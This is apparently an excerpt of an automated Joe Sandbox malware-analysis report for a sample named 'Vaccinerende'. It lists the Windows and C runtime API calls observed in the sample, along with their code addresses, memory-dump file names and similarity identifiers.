• API String ID: 383090722-1948609170
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 0040A159
• SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: LongWindow
• String ID: MZ@
• API String ID: 1378638983-2978689999
APIs
• memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
• memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
• memset.MSVCRT ref: 0042BAAE
• memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
APIs
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040A908
• free.MSVCRT ref: 0040A92B
• memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
APIs
• memcmp.MSVCRT ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT ref: 00408B2B
• memcmp.MSVCRT ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID:
• API String ID: 231171946-0
                                                                              APIs
                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                              • free.MSVCRT ref: 0040B12C
                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                              Similarity
                                                                              • API ID: free$memcpy$mallocstrlen
                                                                              • String ID:
                                                                              • API String ID: 3669619086-0
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                              • malloc.MSVCRT ref: 00417407
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                              • free.MSVCRT ref: 00417425
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                              • String ID:
                                                                              • API String ID: 2605342592-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1961120804-0